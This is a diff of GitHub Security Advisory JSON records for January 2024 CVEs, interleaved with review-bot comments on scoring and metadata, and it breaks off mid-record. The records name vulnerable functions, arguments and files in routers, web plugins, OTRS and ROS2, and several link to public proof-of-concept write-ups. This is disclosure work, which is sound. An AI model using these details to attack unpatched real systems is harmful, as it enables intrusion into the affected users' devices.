diff --git a/advisories/unreviewed/2024/01/GHSA-q87w-hjgf-6vfw/GHSA-q87w-hjgf-6vfw.json b/advisories/unreviewed/2024/01/GHSA-q87w-hjgf-6vfw/GHSA-q87w-hjgf-6vfw.json new file mode 100644 index 0000000000000..77ff5e2ddc0ee --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-q87w-hjgf-6vfw/GHSA-q87w-hjgf-6vfw.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q87w-hjgf-6vfw", + "modified": "2024-01-29T12:30:20Z", + "published": "2024-01-29T12:30:20Z", + "aliases": [ + "CVE-2024-23791" + ], + "details": "Insertion of debug information into log file during building the elastic search index allows reading of sensitive information from articles.This issue affects OTRS: from 7.0.X through 7.0.48, from 8.0.X through 8.0.37, from 2023.X through 2023.1.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23791" + }, + { + "type": "WEB", + "url": "https://otrs.com/release-notes/otrs-security-advisory-2024-02/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-q9p8-42p3-gq3h/GHSA-q9p8-42p3-gq3h.json b/advisories/unreviewed/2024/01/GHSA-q9p8-42p3-gq3h/GHSA-q9p8-42p3-gq3h.json index ef73c7d73c9af..2887b593a2723 100644 --- a/advisories/unreviewed/2024/01/GHSA-q9p8-42p3-gq3h/GHSA-q9p8-42p3-gq3h.json +++ b/advisories/unreviewed/2024/01/GHSA-q9p8-42p3-gq3h/GHSA-q9p8-42p3-gq3h.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-q9p8-42p3-gq3h", - "modified": "2024-01-25T09:30:21Z", + "modified": "2024-01-31T21:31:03Z", "published": "2024-01-25T09:30:21Z", "aliases": [ "CVE-2023-33759" ], "details": "SpliceCom Maximiser Soft PBX v1.5 and before does not restrict excessive authentication attempts, allowing attackers to bypass authentication via a brute force attack.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-307" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T08:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-qcxp-xh47-3g32/GHSA-qcxp-xh47-3g32.json b/advisories/unreviewed/2024/01/GHSA-qcxp-xh47-3g32/GHSA-qcxp-xh47-3g32.json new file mode 100644 index 0000000000000..b257992202222 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-qcxp-xh47-3g32/GHSA-qcxp-xh47-3g32.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qcxp-xh47-3g32", + "modified": "2024-01-29T18:31:49Z", + "published": "2024-01-29T18:31:49Z", + "aliases": [ + "CVE-2024-1006" + ], + "details": "A vulnerability was found in Shanxi Diankeyun Technology NODERP up to 6.0.2 and classified as critical. This issue affects some unknown processing of the file application/index/common.php of the component Cookie Handler. The manipulation of the argument Nod_User_Id/Nod_User_Token leads to improper authentication. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252275. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1006" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/vWuVlU2eg79t" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252275" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252275" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T16:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-qfm4-9qqj-3w82/GHSA-qfm4-9qqj-3w82.json b/advisories/unreviewed/2024/01/GHSA-qfm4-9qqj-3w82/GHSA-qfm4-9qqj-3w82.json index 665fb3f569d62..8eac0d04bea63 100644 --- a/advisories/unreviewed/2024/01/GHSA-qfm4-9qqj-3w82/GHSA-qfm4-9qqj-3w82.json +++ b/advisories/unreviewed/2024/01/GHSA-qfm4-9qqj-3w82/GHSA-qfm4-9qqj-3w82.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-qfm4-9qqj-3w82", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-01-30T21:30:28Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2024-22651" ], "details": "There is a command injection vulnerability in the ssdpcgi_main function of cgibin binary in D-Link DIR-815 router firmware v1.04.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-77" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T16:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-qghg-5fph-q28c/GHSA-qghg-5fph-q28c.json b/advisories/unreviewed/2024/01/GHSA-qghg-5fph-q28c/GHSA-qghg-5fph-q28c.json new file mode 100644 index 0000000000000..dd4e0f743641f --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-qghg-5fph-q28c/GHSA-qghg-5fph-q28c.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qghg-5fph-q28c", + "modified": "2024-01-31T06:30:17Z", + "published": "2024-01-31T06:30:17Z", + "aliases": [ + "CVE-2024-0914" + ], + "details": "A timing side-channel vulnerability has been discovered in the opencryptoki package while processing RSA PKCS#1 v1.5 padded ciphertexts. This flaw could potentially enable unauthorized RSA ciphertext decryption or signing, even without access to the corresponding private key.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0914" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2024-0914" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2260407" + }, + { + "type": "WEB", + "url": "https://people.redhat.com/~hkario/marvin/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-203" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T05:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-qgmp-pg7x-2982/GHSA-qgmp-pg7x-2982.json b/advisories/unreviewed/2024/01/GHSA-qgmp-pg7x-2982/GHSA-qgmp-pg7x-2982.json new file mode 100644 index 0000000000000..857bba2236d8d --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-qgmp-pg7x-2982/GHSA-qgmp-pg7x-2982.json 
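Review bot: `I:N` in the vector conflicts with the details, which say the timing oracle can enable unauthorized signing as well as decryption — forging signatures is an integrity impact, so either the vector or the wording should change. The pkcs11-provider entry for the same Marvin-style flaw in this diff (GHSA-phf3-25c6-93hv) is scored `C:H/I:H/A:H` HIGH, so the two records disagree on the impact of the same attack class. No fixed opencryptoki version is named; the Red Hat bugzilla link is the only place a reader can look for one.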
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qgmp-pg7x-2982", + "modified": "2024-02-08T18:30:38Z", + "published": "2024-01-31T00:30:17Z", + "aliases": [ + "CVE-2023-51197" + ], + "details": "An issue discovered in shell command execution in ROS2 (Robot Operating System 2) Foxy Fitzroy, with ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows an attacker to run arbitrary commands and cause other impacts.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51197" + }, + { + "type": "WEB", + "url": "https://github.com/16yashpatel/CVE-2023-51197" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T22:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-qh5h-jvwg-m9xw/GHSA-qh5h-jvwg-m9xw.json b/advisories/unreviewed/2024/01/GHSA-qh5h-jvwg-m9xw/GHSA-qh5h-jvwg-m9xw.json index 74ee3f6142ecf..fab6e66cbc83f 100644 --- a/advisories/unreviewed/2024/01/GHSA-qh5h-jvwg-m9xw/GHSA-qh5h-jvwg-m9xw.json +++ b/advisories/unreviewed/2024/01/GHSA-qh5h-jvwg-m9xw/GHSA-qh5h-jvwg-m9xw.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-qh5h-jvwg-m9xw", - "modified": "2024-01-23T03:31:08Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T03:31:08Z", "aliases": [ "CVE-2024-23215" ], "details": "An issue was addressed with improved handling of temporary files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to access user-sensitive data.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } ], "affected": [ 
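Review bot: This record gives consumers nothing actionable: the details name no vulnerable package, binary, or API ("shell command execution in ROS2 Foxy Fitzroy" plus what look like environment settings is not a component), no fixed version, and the sole non-NVD reference is a researcher's personal repository rather than a vendor advisory. With `CRITICAL` severity and `CWE-78`, this will page on-call teams that cannot determine whether they are affected; a note that no maintainer acknowledgement is referenced, or a link to an upstream tracker, would help. The `ROS_VERSION=2` / `ROS_PYTHON_VERSION=3` mention reads like the reporter's environment rather than a precondition and should be clarified or dropped.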
@@ -55,7 +58,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T01:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-qhv7-h7vp-v9vr/GHSA-qhv7-h7vp-v9vr.json b/advisories/unreviewed/2024/01/GHSA-qhv7-h7vp-v9vr/GHSA-qhv7-h7vp-v9vr.json new file mode 100644 index 0000000000000..5af91b7cd2db3 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-qhv7-h7vp-v9vr/GHSA-qhv7-h7vp-v9vr.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qhv7-h7vp-v9vr", + "modified": "2024-01-29T09:30:24Z", + "published": "2024-01-29T09:30:24Z", + "aliases": [ + "CVE-2023-45921" + ], + "details": "Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45921" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T09:15:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-qj3p-g2m7-rx94/GHSA-qj3p-g2m7-rx94.json b/advisories/unreviewed/2024/01/GHSA-qj3p-g2m7-rx94/GHSA-qj3p-g2m7-rx94.json new file mode 100644 index 0000000000000..d82a266b3e509 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-qj3p-g2m7-rx94/GHSA-qj3p-g2m7-rx94.json 
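Review bot: A REJECTED CVE is being published as a live advisory; OSV schema 1.4.0 has a top-level `withdrawn` timestamp for exactly this case, and setting it (e.g. `"withdrawn": "2024-01-29T09:30:24Z"`) lets downstream scanners drop the record instead of surfacing an ID whose own details say "DO NOT USE THIS CANDIDATE NUMBER". The `details` text is NVD's rejection boilerplate rather than a vulnerability description, so without `withdrawn` the entry is indistinguishable from an advisory that merely lacks severity.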
@@ -0,0 +1,43 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qj3p-g2m7-rx94",
+ "modified": "2024-02-08T18:30:39Z",
+ "published": "2024-01-31T18:31:26Z",
+ "aliases": [
+ "CVE-2023-5390"
+ ],
+ "details": "An attacker could potentially exploit this vulnerability, leading to files being read from the Honeywell Experion ControlEdge VirtualUOC and ControlEdge UOC. This exploit could be used to read files from the controller that may expose limited information from the device. Honeywell recommends updating to the most recent version of the product. See Honeywell Security Notification for recommendations on upgrading and versioning.\n\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5390"
+ },
+ {
+ "type": "WEB",
+ "url": "https://process.honeywell.com"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.honeywell.com/us/en/product-security"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22",
+ "CWE-36"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T18:15:46Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-qjqj-4cq6-6f2f/GHSA-qjqj-4cq6-6f2f.json b/advisories/unreviewed/2024/01/GHSA-qjqj-4cq6-6f2f/GHSA-qjqj-4cq6-6f2f.json
index fe8a5d2e51cee..ec88d446e8e12 100644
--- a/advisories/unreviewed/2024/01/GHSA-qjqj-4cq6-6f2f/GHSA-qjqj-4cq6-6f2f.json
+++ b/advisories/unreviewed/2024/01/GHSA-qjqj-4cq6-6f2f/GHSA-qjqj-4cq6-6f2f.json
@@ -36,7 +36,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-346",
+ "CWE-787"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-qmff-49xc-7rf6/GHSA-qmff-49xc-7rf6.json b/advisories/unreviewed/2024/01/GHSA-qmff-49xc-7rf6/GHSA-qmff-49xc-7rf6.json
index 7b9980fb82688..ec11342f8c1e3 100644
--- a/advisories/unreviewed/2024/01/GHSA-qmff-49xc-7rf6/GHSA-qmff-49xc-7rf6.json
+++ b/advisories/unreviewed/2024/01/GHSA-qmff-49xc-7rf6/GHSA-qmff-49xc-7rf6.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qmff-49xc-7rf6",
- "modified": "2024-01-24T21:30:32Z",
+ "modified": "2024-02-07T21:30:26Z",
 "published": "2024-01-17T18:31:36Z",
 "aliases": [
 "CVE-2024-0646"
@@ -21,6 +21,18 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0646"
 },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0723"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0724"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0725"
+ },
 {
 "type": "WEB",
 "url": "https://access.redhat.com/security/cve/CVE-2024-0646"
diff --git a/advisories/unreviewed/2024/01/GHSA-qpjv-gm6g-p2gh/GHSA-qpjv-gm6g-p2gh.json b/advisories/unreviewed/2024/01/GHSA-qpjv-gm6g-p2gh/GHSA-qpjv-gm6g-p2gh.json
new file mode 100644
index 0000000000000..2a880d492f273
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-qpjv-gm6g-p2gh/GHSA-qpjv-gm6g-p2gh.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qpjv-gm6g-p2gh",
+ "modified": "2024-01-31T06:30:17Z",
+ "published": "2024-01-31T06:30:17Z",
+ "aliases": [
+ "CVE-2023-3934"
+ ],
+ "details": "Rejected reason: Please discard this CVE, we are not using this anymore. The vulnerability turned out to be a non-security issue",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3934"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T06:15:45Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-qr6c-pgxx-rqc6/GHSA-qr6c-pgxx-rqc6.json b/advisories/unreviewed/2024/01/GHSA-qr6c-pgxx-rqc6/GHSA-qr6c-pgxx-rqc6.json
new file mode 100644
index 0000000000000..a99d5902179a1
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-qr6c-pgxx-rqc6/GHSA-qr6c-pgxx-rqc6.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qr6c-pgxx-rqc6",
+ "modified": "2024-01-31T18:31:26Z",
+ "published": "2024-01-31T18:31:26Z",
+ "aliases": [
+ "CVE-2024-22307"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Lab WP-Lister Lite for eBay allows Reflected XSS.This issue affects WP-Lister Lite for eBay: from n/a through 3.5.7.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22307"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/wp-lister-for-ebay/wordpress-wp-lister-lite-for-ebay-plugin-3-5-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T17:15:36Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-qrph-vx83-8q9v/GHSA-qrph-vx83-8q9v.json b/advisories/unreviewed/2024/01/GHSA-qrph-vx83-8q9v/GHSA-qrph-vx83-8q9v.json
index e277f34e9d0c0..f25fe07c2a633 100644
--- a/advisories/unreviewed/2024/01/GHSA-qrph-vx83-8q9v/GHSA-qrph-vx83-8q9v.json
+++ b/advisories/unreviewed/2024/01/GHSA-qrph-vx83-8q9v/GHSA-qrph-vx83-8q9v.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qrph-vx83-8q9v",
- "modified": "2024-01-23T12:30:29Z",
+ "modified": "2024-01-30T00:30:29Z",
 "published": "2024-01-23T12:30:29Z",
 "aliases": [
 "CVE-2024-23182"
 ],
 "details": "Relative path traversal vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to delete arbitrary files on the server.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -29,9 +32,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-22"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T10:15:10Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-qrpx-55hc-9pr8/GHSA-qrpx-55hc-9pr8.json b/advisories/unreviewed/2024/01/GHSA-qrpx-55hc-9pr8/GHSA-qrpx-55hc-9pr8.json
new file mode 100644
index 0000000000000..ffce22608aac1
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-qrpx-55hc-9pr8/GHSA-qrpx-55hc-9pr8.json
@@ -0,0 +1,47 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qrpx-55hc-9pr8",
+ "modified": "2024-01-29T15:30:29Z",
+ "published": "2024-01-29T15:30:29Z",
+ "aliases": [
+ "CVE-2024-1000"
+ ],
+ "details": "A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been rated as critical. This issue affects the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument command leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252269 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1000"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setTracerouteCfg-b6b3fe05b4a945a3bc460dbcb61dfc75?pvs=4"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252269"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252269"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-121",
+ "CWE-787"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T14:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-qrr8-cg7m-h9r4/GHSA-qrr8-cg7m-h9r4.json b/advisories/unreviewed/2024/01/GHSA-qrr8-cg7m-h9r4/GHSA-qrr8-cg7m-h9r4.json
index 02f53ccf3e272..e37e1270eac82 100644
--- a/advisories/unreviewed/2024/01/GHSA-qrr8-cg7m-h9r4/GHSA-qrr8-cg7m-h9r4.json
+++ b/advisories/unreviewed/2024/01/GHSA-qrr8-cg7m-h9r4/GHSA-qrr8-cg7m-h9r4.json
@@ -21,6 +21,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6592"
 },
+ {
+ "type": "WEB",
+ "url": "https://research.cleantalk.org/cve-2023-6592-fastdup-database-users-password-leak-poc-exploit/"
+ },
 {
 "type": "WEB",
 "url": "https://wpscan.com/vulnerability/a39bb807-b143-4863-88ff-1783e407d7d4/"
diff --git a/advisories/unreviewed/2024/01/GHSA-qwm3-5pgj-28qh/GHSA-qwm3-5pgj-28qh.json b/advisories/unreviewed/2024/01/GHSA-qwm3-5pgj-28qh/GHSA-qwm3-5pgj-28qh.json
index ae51595727f81..86256dad1e8ca 100644
--- a/advisories/unreviewed/2024/01/GHSA-qwm3-5pgj-28qh/GHSA-qwm3-5pgj-28qh.json
+++ b/advisories/unreviewed/2024/01/GHSA-qwm3-5pgj-28qh/GHSA-qwm3-5pgj-28qh.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qwm3-5pgj-28qh",
- "modified": "2024-01-23T03:31:08Z",
+ "modified": "2024-01-30T18:30:19Z",
 "published": "2024-01-23T03:31:08Z",
 "aliases": [
 "CVE-2024-23212"
 ],
 "details": "The issue was addressed with improved memory handling. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, macOS Ventura 13.6.4, macOS Monterey 12.7.3. An app may be able to execute arbitrary code with kernel privileges.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -79,7 +82,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T01:15:11Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-qxvp-mr53-fp4v/GHSA-qxvp-mr53-fp4v.json b/advisories/unreviewed/2024/01/GHSA-qxvp-mr53-fp4v/GHSA-qxvp-mr53-fp4v.json
index 7a3c8e8fa7b2f..f70f3c93c0d21 100644
--- a/advisories/unreviewed/2024/01/GHSA-qxvp-mr53-fp4v/GHSA-qxvp-mr53-fp4v.json
+++ b/advisories/unreviewed/2024/01/GHSA-qxvp-mr53-fp4v/GHSA-qxvp-mr53-fp4v.json
@@ -28,7 +28,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-79"
+ "CWE-79",
+ "CWE-80"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-r2mg-qw96-w89q/GHSA-r2mg-qw96-w89q.json b/advisories/unreviewed/2024/01/GHSA-r2mg-qw96-w89q/GHSA-r2mg-qw96-w89q.json
index 0b4a5af508a3d..8b4539e36289c 100644
--- a/advisories/unreviewed/2024/01/GHSA-r2mg-qw96-w89q/GHSA-r2mg-qw96-w89q.json
+++ b/advisories/unreviewed/2024/01/GHSA-r2mg-qw96-w89q/GHSA-r2mg-qw96-w89q.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-r2mg-qw96-w89q",
- "modified": "2024-01-23T03:31:08Z",
+ "modified": "2024-01-30T18:30:19Z",
 "published": "2024-01-23T03:31:08Z",
 "aliases": [
 "CVE-2024-23208"
 ],
 "details": "The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to execute arbitrary code with kernel privileges.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -55,7 +58,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T01:15:10Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-r3xx-hr64-gmm2/GHSA-r3xx-hr64-gmm2.json b/advisories/unreviewed/2024/01/GHSA-r3xx-hr64-gmm2/GHSA-r3xx-hr64-gmm2.json
index eff32ce442622..d0e08bb8c1d30 100644
--- a/advisories/unreviewed/2024/01/GHSA-r3xx-hr64-gmm2/GHSA-r3xx-hr64-gmm2.json
+++ b/advisories/unreviewed/2024/01/GHSA-r3xx-hr64-gmm2/GHSA-r3xx-hr64-gmm2.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-r3xx-hr64-gmm2",
- "modified": "2024-01-25T21:32:15Z",
+ "modified": "2024-01-29T18:31:48Z",
 "published": "2024-01-25T21:32:15Z",
 "aliases": [
 "CVE-2024-22636"
 ],
 "details": "PluXml Blog v5.8.9 was discovered to contain a remote code execution (RCE) vulnerability in the Static Pages feature. This vulnerability is exploited via injecting a crafted payload into the Content field.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -27,7 +30,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-25T21:15:09Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-r7mg-69gq-5g8v/GHSA-r7mg-69gq-5g8v.json b/advisories/unreviewed/2024/01/GHSA-r7mg-69gq-5g8v/GHSA-r7mg-69gq-5g8v.json
index 04e7d31ce3085..7afa70719015c 100644
--- a/advisories/unreviewed/2024/01/GHSA-r7mg-69gq-5g8v/GHSA-r7mg-69gq-5g8v.json
+++ b/advisories/unreviewed/2024/01/GHSA-r7mg-69gq-5g8v/GHSA-r7mg-69gq-5g8v.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-r7mg-69gq-5g8v",
- "modified": "2024-01-23T21:30:21Z",
+ "modified": "2024-01-29T18:31:48Z",
 "published": "2024-01-23T21:30:21Z",
 "aliases": [
 "CVE-2023-52326"
 ],
